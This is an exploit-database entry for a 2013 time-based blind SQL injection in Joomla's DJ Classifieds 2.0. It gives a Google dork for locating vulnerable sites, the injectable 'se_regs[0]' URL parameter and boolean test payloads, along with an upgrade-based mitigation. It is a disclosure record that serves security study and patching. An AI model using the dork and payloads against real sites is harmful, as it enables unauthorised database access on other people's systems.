Joomla - DJ Classifieds - Time-Based Blind SQL Injection

vendor:

DJ Classifieds

by:

Napsterakos

7,5

CVSS

HIGH

Time-Based Blind SQL Injection

CWE

Product Name: DJ Classifieds

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: YES

Related CWE: N/A

CPE: a:design-joomla:dj-classifieds

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2013

Joomla – DJ Classifieds – Time-Based Blind SQL Injection

A time-based blind SQL injection vulnerability exists in Joomla DJ Classifieds version 2.0. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Upgrade to the latest version of Joomla DJ Classifieds and apply the latest security patches.

Source

Exploit-DB raw data:

 $$$$$$\      $$\   $$\     $$$$$$\  
$$  __$$\     $$ |  $$ |   $$  __$$\ 
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\  
$$ |\_$$ |    $$  __$$ |    \____$$\ 
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/ 
 
# Exploit Title: Joomla - DJ Classifieds - Time-Based Blind SQL Injection
# Google Dork: inurl:"index.php/dj-classifieds/" or inurl:"/dj-classifieds/"
# Date: 4/5/2013
# Exploit Author: Napsterakos
# Vendor Homepage: http://design-joomla.eu
# Software Link: -
# Version: 2.0
# Tested on: Linux


Link: http://server/joomla/index.php/dj-classifieds/

Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]

# Exploit-DB Note:
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0
# dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=1

Credits to: Greek Hacking Scene